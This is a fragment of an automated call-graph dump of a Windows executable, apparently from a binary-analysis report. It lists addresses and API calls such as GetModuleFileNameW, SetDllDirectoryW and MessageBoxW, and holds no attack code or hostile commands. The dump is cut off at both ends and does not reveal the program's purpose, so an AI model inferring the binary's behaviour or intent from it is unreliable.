19140->19143 19684 7ff78f49a2e0 19687 7ff78f49a25c 19684->19687 19694 7ff78f4a0cb8 EnterCriticalSection 19687->19694 19695 7ff78f49cae0 19706 7ff78f4a0cb8 EnterCriticalSection 19695->19706 19161 7ff78f49b590 19162 7ff78f49b5aa 19161->19162 19163 7ff78f49b595 19161->19163 19167 7ff78f49b5b0 19163->19167 19168 7ff78f49b5f2 19167->19168 19169 7ff78f49b5fa 19167->19169 19171 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19168->19171 19170 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19169->19170 19172 7ff78f49b607 19170->19172 19171->19169 19173 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19172->19173 19174 7ff78f49b614 19173->19174 19175 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19174->19175 19176 7ff78f49b621 19175->19176 19177 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19176->19177 19178 7ff78f49b62e 19177->19178 19179 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19178->19179 19180 7ff78f49b63b 19179->19180 19181 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19180->19181 19182 7ff78f49b648 19181->19182 19183 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19182->19183 19184 7ff78f49b655 19183->19184 19185 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19184->19185 19186 7ff78f49b665 19185->19186 19187 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19186->19187 19188 7ff78f49b675 19187->19188 19193 7ff78f49b458 19188->19193 19207 7ff78f4a0cb8 EnterCriticalSection 19193->19207 19209 7ff78f48bf90 19210 7ff78f48bfa0 19209->19210 19226 7ff78f49a138 19210->19226 19212 7ff78f48bfac 19232 7ff78f48c298 19212->19232 19214 7ff78f48c57c 7 API calls 19216 7ff78f48c045 19214->19216 19215 7ff78f48bfc4 _RTC_Initialize 19224 7ff78f48c019 19215->19224 19237 7ff78f48c448 19215->19237 19218 7ff78f48bfd9 19240 7ff78f4995a4 19218->19240 19224->19214 19225 7ff78f48c035 19224->19225 19227 7ff78f49a149 19226->19227 19228 7ff78f4954c4 _get_daylight 11 API calls 19227->19228 19229 7ff78f49a151 19227->19229 19230 7ff78f49a160 19228->19230 19229->19212 19231 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 19230->19231 19231->19229 19233 7ff78f48c2a9 19232->19233 19236 7ff78f48c2ae __scrt_release_startup_lock 19232->19236 19234 7ff78f48c57c 7 API calls 19233->19234 19233->19236 19235 7ff78f48c322 19234->19235 19236->19215 19265 7ff78f48c40c 19237->19265 19239 7ff78f48c451 19239->19218 19241 7ff78f4995c4 19240->19241 19242 7ff78f48bfe5 19240->19242 19243 7ff78f4995e2 GetModuleFileNameW 19241->19243 19244 7ff78f4995cc 19241->19244 19242->19224 19264 7ff78f48c51c InitializeSListHead 19242->19264 19248 7ff78f49960d 19243->19248 19245 7ff78f4954c4 _get_daylight 11 API calls 19244->19245 19246 7ff78f4995d1 19245->19246 19247 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 19246->19247 19247->19242 19280 7ff78f499544 19248->19280 19251 7ff78f499655 19252 7ff78f4954c4 _get_daylight 11 API calls 19251->19252 19253 7ff78f49965a 19252->19253 19254 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19253->19254 19254->19242 19255 7ff78f49968f 19257 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19255->19257 19256 7ff78f49966d 19256->19255 19258 7ff78f4996d4 19256->19258 19259 7ff78f4996bb 19256->19259 19257->19242 19261 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19258->19261 19260 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19259->19260 19262 7ff78f4996c4 19260->19262 19261->19255 19263 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19262->19263 19263->19242 19266 7ff78f48c426 19265->19266 19268 7ff78f48c41f 19265->19268 19269 7ff78f49a77c 19266->19269 19268->19239 19272 7ff78f49a3b8 19269->19272 19279 7ff78f4a0cb8 EnterCriticalSection 19272->19279 19281 7ff78f49955c 19280->19281 19285 7ff78f499594 19280->19285 19282 7ff78f49f158 _get_daylight 11 API calls 19281->19282 19281->19285 19283 7ff78f49958a 19282->19283 19284 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19283->19284 19284->19285 19285->19251 19285->19256 19785 7ff78f495310 19786 7ff78f49531b 19785->19786 19794 7ff78f49f764 19786->19794 19807 7ff78f4a0cb8 EnterCriticalSection 19794->19807 19286 7ff78f4aab89 19287 7ff78f4aaba2 19286->19287 19288 7ff78f4aab98 19286->19288 19290 7ff78f4a0d18 LeaveCriticalSection 19288->19290 16162 7ff78f48c07c 16183 7ff78f48c24c 16162->16183 16165 7ff78f48c1c8 16279 7ff78f48c57c IsProcessorFeaturePresent 16165->16279 16166 7ff78f48c098 __scrt_acquire_startup_lock 16168 7ff78f48c1d2 16166->16168 16175 7ff78f48c0b6 __scrt_release_startup_lock 16166->16175 16169 7ff78f48c57c 7 API calls 16168->16169 16171 7ff78f48c1dd __CxxCallCatchBlock 16169->16171 16170 7ff78f48c0db 16172 7ff78f48c161 16189 7ff78f48c6c8 16172->16189 16174 7ff78f48c166 16192 7ff78f481000 16174->16192 16175->16170 16175->16172 16268 7ff78f49a0bc 16175->16268 16180 7ff78f48c189 16180->16171 16275 7ff78f48c3e0 16180->16275 16286 7ff78f48c84c 16183->16286 16186 7ff78f48c090 16186->16165 16186->16166 16187 7ff78f48c27b __scrt_initialize_crt 16187->16186 16288 7ff78f48d998 16187->16288 16315 7ff78f48d0e0 16189->16315 16193 7ff78f48100b 16192->16193 16317 7ff78f4886b0 16193->16317 16195 7ff78f48101d 16324 7ff78f495ef8 16195->16324 16197 7ff78f4839cb 16331 7ff78f481eb0 16197->16331 16201 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16202 7ff78f483ae6 16201->16202 16273 7ff78f48c70c GetModuleHandleW 16202->16273 16203 7ff78f4839ea 16265 7ff78f483ad2 16203->16265 16347 7ff78f487b60 16203->16347 16205 7ff78f483a1f 16206 7ff78f483a6b 16205->16206 16208 7ff78f487b60 61 API calls 16205->16208 16362 7ff78f488040 16206->16362 16213 7ff78f483a40 __std_exception_destroy 16208->16213 16209 7ff78f483a80 16366 7ff78f481cb0 16209->16366 16212 7ff78f483b71 16215 7ff78f483b95 16212->16215 16385 7ff78f4814f0 16212->16385 16213->16206 16216 7ff78f488040 58 API calls 16213->16216 16214 7ff78f481cb0 121 API calls 16217 7ff78f483ab6 16214->16217 16219 7ff78f483bef 16215->16219 16215->16265 16392 7ff78f488ae0 16215->16392 16216->16206 16221 7ff78f483aba 16217->16221 16222 7ff78f483af8 16217->16222 16406 7ff78f486de0 16219->16406 16467 7ff78f482b30 16221->16467 16222->16212 16480 7ff78f483fd0 16222->16480 16223 7ff78f483bcc 16227 7ff78f483be2 SetDllDirectoryW 16223->16227 16228 7ff78f483bd1 16223->16228 16227->16219 16231 7ff78f482b30 59 API calls 16228->16231 16231->16265 16233 7ff78f483b16 16238 7ff78f482b30 59 API calls 16233->16238 16234 7ff78f483c09 16260 7ff78f483c3b 16234->16260 16512 7ff78f4865f0 16234->16512 16236 7ff78f483d06 16410 7ff78f4834c0 16236->16410 16237 7ff78f483b44 16237->16212 16241 7ff78f483b49 16237->16241 16238->16265 16499 7ff78f49018c 16241->16499 16245 7ff78f483c5a 16251 7ff78f483ca5 16245->16251 16548 7ff78f481ef0 16245->16548 16246 7ff78f483c3d 16250 7ff78f486840 FreeLibrary 16246->16250 16250->16260 16251->16265 16552 7ff78f483460 16251->16552 16253 7ff78f483d2e 16255 7ff78f487b60 61 API calls 16253->16255 16258 7ff78f483d3a 16255->16258 16424 7ff78f488080 16258->16424 16259 7ff78f483ce1 16261 7ff78f486840 FreeLibrary 16259->16261 16260->16236 16260->16245 16261->16265 16265->16201 16269 7ff78f49a0f4 16268->16269 16270 7ff78f49a0d3 16268->16270 16271 7ff78f49a968 45 API calls 16269->16271 16270->16172 16272 7ff78f49a0f9 16271->16272 16274 7ff78f48c71d 16273->16274 16274->16180 16277 7ff78f48c3f1 16275->16277 16276 7ff78f48c1a0 16276->16170 16277->16276 16278 7ff78f48d998 __scrt_initialize_crt 7 API calls 16277->16278 16278->16276 16280 7ff78f48c5a2 _wfindfirst32i64 __scrt_get_show_window_mode 16279->16280 16281 7ff78f48c5c1 RtlCaptureContext RtlLookupFunctionEntry 16280->16281 16282 7ff78f48c5ea RtlVirtualUnwind 16281->16282 16283 7ff78f48c626 __scrt_get_show_window_mode 16281->16283 16282->16283 16284 7ff78f48c658 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16283->16284 16285 7ff78f48c6aa _wfindfirst32i64 16284->16285 16285->16168 16287 7ff78f48c26e __scrt_dllmain_crt_thread_attach 16286->16287 16287->16186 16287->16187 16289 7ff78f48d9a0 16288->16289 16290 7ff78f48d9aa 16288->16290 16294 7ff78f48dd14 16289->16294 16290->16186 16295 7ff78f48d9a5 16294->16295 16296 7ff78f48dd23 16294->16296 16298 7ff78f48dd80 16295->16298 16302 7ff78f48df50 16296->16302 16299 7ff78f48ddab 16298->16299 16300 7ff78f48ddaf 16299->16300 16301 7ff78f48dd8e DeleteCriticalSection 16299->16301 16300->16290 16301->16299 16306 7ff78f48ddb8 16302->16306 16307 7ff78f48ded2 TlsFree 16306->16307 16313 7ff78f48ddfc __vcrt_InitializeCriticalSectionEx 16306->16313 16308 7ff78f48de2a LoadLibraryExW 16310 7ff78f48dea1 16308->16310 16311 7ff78f48de4b GetLastError 16308->16311 16309 7ff78f48dec1 GetProcAddress 16309->16307 16310->16309 16312 7ff78f48deb8 FreeLibrary 16310->16312 16311->16313 16312->16309 16313->16307 16313->16308 16313->16309 16314 7ff78f48de6d LoadLibraryExW 16313->16314 16314->16310 16314->16313 16316 7ff78f48c6df GetStartupInfoW 16315->16316 16316->16174 16319 7ff78f4886cf 16317->16319 16318 7ff78f488720 WideCharToMultiByte 16318->16319 16321 7ff78f4887c6 16318->16321 16319->16318 16319->16321 16322 7ff78f488774 WideCharToMultiByte 16319->16322 16323 7ff78f4886d7 __std_exception_destroy 16319->16323 16586 7ff78f4829e0 16321->16586 16322->16319 16322->16321 16323->16195 16326 7ff78f4a0050 16324->16326 16325 7ff78f4a00a3 16327 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16325->16327 16326->16325 16328 7ff78f4a00f6 16326->16328 16330 7ff78f4a00cc 16327->16330 16917 7ff78f49ff28 16328->16917 16330->16197 16332 7ff78f481ec5 16331->16332 16333 7ff78f481ee0 16332->16333 16925 7ff78f482890 16332->16925 16333->16265 16335 7ff78f483ec0 16333->16335 16336 7ff78f48bc60 16335->16336 16337 7ff78f483ecc GetModuleFileNameW 16336->16337 16338 7ff78f483efb 16337->16338 16339 7ff78f483f12 16337->16339 16340 7ff78f4829e0 57 API calls 16338->16340 16965 7ff78f488bf0 16339->16965 16342 7ff78f483f0e 16340->16342 16345 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16342->16345 16344 7ff78f482b30 59 API calls 16344->16342 16346 7ff78f483f4f 16345->16346 16346->16203 16348 7ff78f487b6a 16347->16348 16349 7ff78f488ae0 57 API calls 16348->16349 16350 7ff78f487b8c GetEnvironmentVariableW 16349->16350 16351 7ff78f487bf6 16350->16351 16352 7ff78f487ba4 ExpandEnvironmentStringsW 16350->16352 16354 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16351->16354 16353 7ff78f488bf0 59 API calls 16352->16353 16355 7ff78f487bcc 16353->16355 16356 7ff78f487c08 16354->16356 16355->16351 16357 7ff78f487bd6 16355->16357 16356->16205 16976 7ff78f49a99c 16357->16976 16360 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16361 7ff78f487bee 16360->16361 16361->16205 16363 7ff78f488ae0 57 API calls 16362->16363 16364 7ff78f488057 SetEnvironmentVariableW 16363->16364 16365 7ff78f48806f __std_exception_destroy 16364->16365 16365->16209 16367 7ff78f481cbe 16366->16367 16368 7ff78f481ef0 49 API calls 16367->16368 16369 7ff78f481cf4 16368->16369 16370 7ff78f481dde 16369->16370 16371 7ff78f481ef0 49 API calls 16369->16371 16373 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16370->16373 16372 7ff78f481d1a 16371->16372 16372->16370 16983 7ff78f481aa0 16372->16983 16374 7ff78f481e6c 16373->16374 16374->16212 16374->16214 16378 7ff78f481dcc 16379 7ff78f483e40 49 API calls 16378->16379 16379->16370 16380 7ff78f481d8f 16380->16378 16381 7ff78f481e34 16380->16381 16382 7ff78f483e40 49 API calls 16381->16382 16383 7ff78f481e41 16382->16383 17019 7ff78f484050 16383->17019 16386 7ff78f481506 16385->16386 16389 7ff78f48157f 16385->16389 17061 7ff78f487950 16386->17061 16389->16215 16390 7ff78f482b30 59 API calls 16391 7ff78f481564 16390->16391 16391->16215 16393 7ff78f488b01 MultiByteToWideChar 16392->16393 16394 7ff78f488b87 MultiByteToWideChar 16392->16394 16397 7ff78f488b27 16393->16397 16398 7ff78f488b4c 16393->16398 16395 7ff78f488bcf 16394->16395 16396 7ff78f488baa 16394->16396 16395->16223 16399 7ff78f4829e0 55 API calls 16396->16399 16400 7ff78f4829e0 55 API calls 16397->16400 16398->16394 16403 7ff78f488b62 16398->16403 16401 7ff78f488bbd 16399->16401 16402 7ff78f488b3a 16400->16402 16401->16223 16402->16223 16404 7ff78f4829e0 55 API calls 16403->16404 16405 7ff78f488b75 16404->16405 16405->16223 16407 7ff78f486df5 16406->16407 16408 7ff78f483bf4 16407->16408 16409 7ff78f482890 59 API calls 16407->16409 16408->16260 16503 7ff78f486a90 16408->16503 16409->16408 16413 7ff78f483533 16410->16413 16416 7ff78f483574 16410->16416 16411 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16412 7ff78f4835c5 16411->16412 16412->16265 16417 7ff78f487fd0 16412->16417 16413->16416 17586 7ff78f481710 16413->17586 17628 7ff78f482d70 16413->17628 16416->16411 16418 7ff78f488ae0 57 API calls 16417->16418 16419 7ff78f487fef 16418->16419 16420 7ff78f488ae0 57 API calls 16419->16420 16421 7ff78f487fff 16420->16421 16422 7ff78f497dec 38 API calls 16421->16422 16423 7ff78f48800d __std_exception_destroy 16422->16423 16423->16253 16425 7ff78f488090 16424->16425 16426 7ff78f488ae0 57 API calls 16425->16426 16468 7ff78f482b50 16467->16468 16469 7ff78f494ac4 49 API calls 16468->16469 16470 7ff78f482b9b __scrt_get_show_window_mode 16469->16470 16471 7ff78f488ae0 57 API calls 16470->16471 16472 7ff78f482bd0 16471->16472 16473 7ff78f482c0d MessageBoxA 16472->16473 16474 7ff78f482bd5 16472->16474 16475 7ff78f482c27 16473->16475 16476 7ff78f488ae0 57 API calls 16474->16476 16477 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16475->16477 16478 7ff78f482bef MessageBoxW 16476->16478 16479 7ff78f482c37 16477->16479 16478->16475 16479->16265 16481 7ff78f483fdc 16480->16481 16482 7ff78f488ae0 57 API calls 16481->16482 16483 7ff78f484007 16482->16483 16484 7ff78f488ae0 57 API calls 16483->16484 16485 7ff78f48401a 16484->16485 18123 7ff78f4964a8 16485->18123 16488 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16489 7ff78f483b0e 16488->16489 16489->16233 16490 7ff78f4882b0 16489->16490 16491 7ff78f4882d4 16490->16491 16492 7ff78f4883ab __std_exception_destroy 16491->16492 16493 7ff78f490814 73 API calls 16491->16493 16492->16237 16494 7ff78f4882ee 16493->16494 16494->16492 18502 7ff78f499070 16494->18502 16500 7ff78f4901bc 16499->16500 18517 7ff78f48ff68 16500->18517 16504 7ff78f486ab3 16503->16504 16506 7ff78f486aca 16503->16506 16504->16506 18528 7ff78f4815a0 16504->18528 16506->16234 16507 7ff78f486ad4 16507->16506 16508 7ff78f484050 49 API calls 16507->16508 16509 7ff78f486b35 16508->16509 16510 7ff78f482b30 59 API calls 16509->16510 16511 7ff78f486ba5 memcpy_s __std_exception_destroy 16509->16511 16510->16506 16511->16234 16517 7ff78f48660a memcpy_s 16512->16517 16513 7ff78f48672f 16516 7ff78f484050 49 API calls 16513->16516 16515 7ff78f48674b 16518 7ff78f482b30 59 API calls 16515->16518 16521 7ff78f4867a8 16516->16521 16517->16513 16517->16515 16517->16517 16519 7ff78f484050 49 API calls 16517->16519 16520 7ff78f486710 16517->16520 16528 7ff78f481710 144 API calls 16517->16528 16530 7ff78f486731 16517->16530 18552 7ff78f481950 16517->18552 16522 7ff78f486741 __std_exception_destroy 16518->16522 16519->16517 16520->16513 16524 7ff78f484050 49 API calls 16520->16524 16523 7ff78f484050 49 API calls 16521->16523 16526 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16522->16526 16525 7ff78f4867d8 16523->16525 16524->16513 16529 7ff78f484050 49 API calls 16525->16529 16527 7ff78f483c1a 16526->16527 16527->16246 16532 7ff78f486570 16527->16532 16528->16517 16529->16522 16531 7ff78f482b30 59 API calls 16530->16531 16531->16522 18556 7ff78f488260 16532->18556 16534 7ff78f48658c 16535 7ff78f488260 58 API calls 16534->16535 16536 7ff78f48659f 16535->16536 16537 7ff78f4865d5 16536->16537 16538 7ff78f4865b7 16536->16538 16539 7ff78f482b30 59 API calls 16537->16539 18560 7ff78f486ef0 GetProcAddress 16538->18560 16549 7ff78f481f15 16548->16549 16550 7ff78f494ac4 49 API calls 16549->16550 16551 7ff78f481f38 16550->16551 16551->16251 18619 7ff78f485bc0 16552->18619 16555 7ff78f4834ad 16555->16259 16605 7ff78f48bc60 16586->16605 16589 7ff78f482a29 16607 7ff78f494ac4 16589->16607 16594 7ff78f481ef0 49 API calls 16595 7ff78f482a86 __scrt_get_show_window_mode 16594->16595 16596 7ff78f488ae0 54 API calls 16595->16596 16597 7ff78f482abb 16596->16597 16598 7ff78f482af8 MessageBoxA 16597->16598 16599 7ff78f482ac0 16597->16599 16600 7ff78f482b12 16598->16600 16601 7ff78f488ae0 54 API calls 16599->16601 16602 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16600->16602 16603 7ff78f482ada MessageBoxW 16601->16603 16604 7ff78f482b22 16602->16604 16603->16600 16604->16323 16606 7ff78f4829fc GetLastError 16605->16606 16606->16589 16611 7ff78f494b1e 16607->16611 16608 7ff78f494b43 16609 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16608->16609 16624 7ff78f494b6d 16609->16624 16610 7ff78f494b7f 16637 7ff78f492d50 16610->16637 16611->16608 16611->16610 16613 7ff78f494c5c 16616 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16613->16616 16615 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16617 7ff78f482a57 16615->16617 16616->16624 16625 7ff78f488560 16617->16625 16618 7ff78f494c80 16618->16613 16620 7ff78f494c8a 16618->16620 16619 7ff78f494c31 16621 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16619->16621 16623 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16620->16623 16621->16624 16622 7ff78f494c28 16622->16613 16622->16619 16623->16624 16624->16615 16626 7ff78f48856c 16625->16626 16627 7ff78f488587 GetLastError 16626->16627 16628 7ff78f48858d FormatMessageW 16626->16628 16627->16628 16629 7ff78f4885c0 16628->16629 16630 7ff78f4885dc WideCharToMultiByte 16628->16630 16631 7ff78f4829e0 54 API calls 16629->16631 16632 7ff78f488616 16630->16632 16634 7ff78f4885d3 16630->16634 16631->16634 16633 7ff78f4829e0 54 API calls 16632->16633 16633->16634 16635 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16634->16635 16636 7ff78f482a5e 16635->16636 16636->16594 16638 7ff78f492d8e 16637->16638 16639 7ff78f492d7e 16637->16639 16640 7ff78f492d97 16638->16640 16647 7ff78f492dc5 16638->16647 16641 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16639->16641 16642 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16640->16642 16643 7ff78f492dbd 16641->16643 16642->16643 16643->16613 16643->16618 16643->16619 16643->16622 16646 7ff78f493074 16649 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16646->16649 16647->16639 16647->16643 16647->16646 16651 7ff78f4936e0 16647->16651 16677 7ff78f4933a8 16647->16677 16707 7ff78f492c30 16647->16707 16710 7ff78f494900 16647->16710 16649->16639 16652 7ff78f493722 16651->16652 16653 7ff78f493795 16651->16653 16654 7ff78f4937bf 16652->16654 16655 7ff78f493728 16652->16655 16656 7ff78f4937ef 16653->16656 16657 7ff78f49379a 16653->16657 16734 7ff78f491c90 16654->16734 16663 7ff78f49372d 16655->16663 16666 7ff78f4937fe 16655->16666 16656->16654 16656->16666 16675 7ff78f493758 16656->16675 16658 7ff78f4937cf 16657->16658 16659 7ff78f49379c 16657->16659 16741 7ff78f491880 16658->16741 16661 7ff78f49373d 16659->16661 16665 7ff78f4937ab 16659->16665 16676 7ff78f49382d 16661->16676 16716 7ff78f494044 16661->16716 16663->16661 16667 7ff78f493770 16663->16667 16663->16675 16665->16654 16669 7ff78f4937b0 16665->16669 16666->16676 16748 7ff78f4920a0 16666->16748 16667->16676 16726 7ff78f494500 16667->16726 16669->16676 16730 7ff78f494698 16669->16730 16671 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16673 7ff78f493ac3 16671->16673 16673->16647 16675->16676 16755 7ff78f49ee18 16675->16755 16676->16671 16678 7ff78f4933c9 16677->16678 16679 7ff78f4933b3 16677->16679 16680 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16678->16680 16693 7ff78f493407 16678->16693 16681 7ff78f493722 16679->16681 16682 7ff78f493795 16679->16682 16679->16693 16680->16693 16683 7ff78f4937bf 16681->16683 16684 7ff78f493728 16681->16684 16685 7ff78f4937ef 16682->16685 16686 7ff78f49379a 16682->16686 16689 7ff78f491c90 38 API calls 16683->16689 16692 7ff78f49372d 16684->16692 16695 7ff78f4937fe 16684->16695 16685->16683 16685->16695 16705 7ff78f493758 16685->16705 16687 7ff78f4937cf 16686->16687 16688 7ff78f49379c 16686->16688 16694 7ff78f491880 38 API calls 16687->16694 16690 7ff78f49373d 16688->16690 16698 7ff78f4937ab 16688->16698 16689->16705 16691 7ff78f494044 47 API calls 16690->16691 16706 7ff78f49382d 16690->16706 16691->16705 16692->16690 16696 7ff78f493770 16692->16696 16692->16705 16693->16647 16694->16705 16697 7ff78f4920a0 38 API calls 16695->16697 16695->16706 16699 7ff78f494500 47 API calls 16696->16699 16696->16706 16697->16705 16698->16683 16700 7ff78f4937b0 16698->16700 16699->16705 16702 7ff78f494698 37 API calls 16700->16702 16700->16706 16701 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16703 7ff78f493ac3 16701->16703 16702->16705 16703->16647 16704 7ff78f49ee18 47 API calls 16704->16705 16705->16704 16705->16706 16706->16701 16892 7ff78f490e54 16707->16892 16711 7ff78f494917 16710->16711 16909 7ff78f49df78 16711->16909 16717 7ff78f494066 16716->16717 16765 7ff78f490cc0 16717->16765 16722 7ff78f494900 45 API calls 16723 7ff78f4941a3 16722->16723 16723->16723 16724 7ff78f494900 45 API calls 16723->16724 16725 7ff78f49422c 16723->16725 16724->16725 16725->16675 16727 7ff78f494518 16726->16727 16729 7ff78f494580 16726->16729 16728 7ff78f49ee18 47 API calls 16727->16728 16727->16729 16728->16729 16729->16675 16733 7ff78f4946b9 16730->16733 16731 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16732 7ff78f4946ea 16731->16732 16732->16675 16733->16731 16733->16732 16735 7ff78f491cc3 16734->16735 16736 7ff78f491cf2 16735->16736 16738 7ff78f491daf 16735->16738 16737 7ff78f490cc0 12 API calls 16736->16737 16740 7ff78f491d2f 16736->16740 16737->16740 16739 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16738->16739 16739->16740 16740->16675 16742 7ff78f4918b3 16741->16742 16743 7ff78f4918e2 16742->16743 16745 7ff78f49199f 16742->16745 16744 7ff78f490cc0 12 API calls 16743->16744 16747 7ff78f49191f 16743->16747 16744->16747 16746 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16745->16746 16746->16747 16747->16675 16749 7ff78f4920d3 16748->16749 16750 7ff78f492102 16749->16750 16752 7ff78f4921bf 16749->16752 16751 7ff78f490cc0 12 API calls 16750->16751 16754 7ff78f49213f 16750->16754 16751->16754 16753 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16752->16753 16753->16754 16754->16675 16756 7ff78f49ee40 16755->16756 16757 7ff78f49ee85 16756->16757 16758 7ff78f494900 45 API calls 16756->16758 16759 7ff78f49ee45 __scrt_get_show_window_mode 16756->16759 16761 7ff78f49ee6e __scrt_get_show_window_mode 16756->16761 16757->16759 16757->16761 16762 7ff78f4a04c8 WideCharToMultiByte 16757->16762 16758->16757 16759->16675 16760 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16760->16759 16761->16759 16761->16760 16763 7ff78f49ef61 16762->16763 16763->16759 16764 7ff78f49ef76 GetLastError 16763->16764 16764->16759 16764->16761 16766 7ff78f490cf7 16765->16766 16772 7ff78f490ce6 16765->16772 16767 7ff78f49dbbc _fread_nolock 12 API calls 16766->16767 16766->16772 16768 7ff78f490d24 16767->16768 16769 7ff78f490d38 16768->16769 16770 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16768->16770 16771 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16769->16771 16770->16769 16771->16772 16773 7ff78f49eb30 16772->16773 16774 7ff78f49eb80 16773->16774 16775 7ff78f49eb4d 16773->16775 16774->16775 16777 7ff78f49ebb2 16774->16777 16776 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16775->16776 16786 7ff78f494181 16776->16786 16782 7ff78f49ecc5 16777->16782 16789 7ff78f49ebfa 16777->16789 16778 7ff78f49edb7 16819 7ff78f49e01c 16778->16819 16780 7ff78f49ed7d 16812 7ff78f49e3b4 16780->16812 16782->16778 16782->16780 16783 7ff78f49ed4c 16782->16783 16785 7ff78f49ed0f 16782->16785 16788 7ff78f49ed05 16782->16788 16805 7ff78f49e694 16783->16805 16795 7ff78f49e8c4 16785->16795 16786->16722 16786->16723 16788->16780 16790 7ff78f49ed0a 16788->16790 16789->16786 16791 7ff78f49aa3c __std_exception_copy 37 API calls 16789->16791 16790->16783 16790->16785 16792 7ff78f49ecb2 16791->16792 16792->16786 16793 7ff78f49aec4 _wfindfirst32i64 17 API calls 16792->16793 16794 7ff78f49ee14 16793->16794 16828 7ff78f4a471c 16795->16828 16799 7ff78f49e96c 16800 7ff78f49e9c1 16799->16800 16801 7ff78f49e98c 16799->16801 16804 7ff78f49e970 16799->16804 16881 7ff78f49e4b0 16800->16881 16877 7ff78f49e76c 16801->16877 16804->16786 16806 7ff78f4a471c 38 API calls 16805->16806 16807 7ff78f49e6de 16806->16807 16808 7ff78f4a4164 37 API calls 16807->16808 16809 7ff78f49e72e 16808->16809 16810 7ff78f49e732 16809->16810 16811 7ff78f49e76c 45 API calls 16809->16811 16810->16786 16811->16810 16813 7ff78f4a471c 38 API calls 16812->16813 16814 7ff78f49e3ff 16813->16814 16815 7ff78f4a4164 37 API calls 16814->16815 16816 7ff78f49e457 16815->16816 16817 7ff78f49e45b 16816->16817 16818 7ff78f49e4b0 45 API calls 16816->16818 16817->16786 16818->16817 16820 7ff78f49e061 16819->16820 16821 7ff78f49e094 16819->16821 16822 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16820->16822 16823 7ff78f49e0ac 16821->16823 16825 7ff78f49e12d 16821->16825 16827 7ff78f49e08d __scrt_get_show_window_mode 16822->16827 16824 7ff78f49e3b4 46 API calls 16823->16824 16824->16827 16826 7ff78f494900 45 API calls 16825->16826 16825->16827 16826->16827 16827->16786 16829 7ff78f4a476f fegetenv 16828->16829 16830 7ff78f4a867c 37 API calls 16829->16830 16834 7ff78f4a47c2 16830->16834 16831 7ff78f4a47ef 16836 7ff78f49aa3c __std_exception_copy 37 API calls 16831->16836 16832 7ff78f4a48b2 16833 7ff78f4a867c 37 API calls 16832->16833 16835 7ff78f4a48dc 16833->16835 16834->16832 16837 7ff78f4a47dd 16834->16837 16838 7ff78f4a488c 16834->16838 16839 7ff78f4a867c 37 API calls 16835->16839 16840 7ff78f4a486d 16836->16840 16837->16831 16837->16832 16841 7ff78f49aa3c __std_exception_copy 37 API calls 16838->16841 16842 7ff78f4a48ed 16839->16842 16843 7ff78f4a5994 16840->16843 16847 7ff78f4a4875 16840->16847 16841->16840 16845 7ff78f4a8870 20 API calls 16842->16845 16844 7ff78f49aec4 _wfindfirst32i64 17 API calls 16843->16844 16846 7ff78f4a59a9 16844->16846 16855 7ff78f4a4956 __scrt_get_show_window_mode 16845->16855 16848 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16847->16848 16849 7ff78f49e911 16848->16849 16873 7ff78f4a4164 16849->16873 16850 7ff78f4a4cff __scrt_get_show_window_mode 16851 7ff78f4a503f 16852 7ff78f4a4280 37 API calls 16851->16852 16860 7ff78f4a5757 16852->16860 16853 7ff78f4a4feb 16853->16851 16857 7ff78f4a59ac memcpy_s 37 API calls 16853->16857 16854 7ff78f4a4997 memcpy_s 16862 7ff78f4a4df3 memcpy_s __scrt_get_show_window_mode 16854->16862 16864 7ff78f4a52db memcpy_s 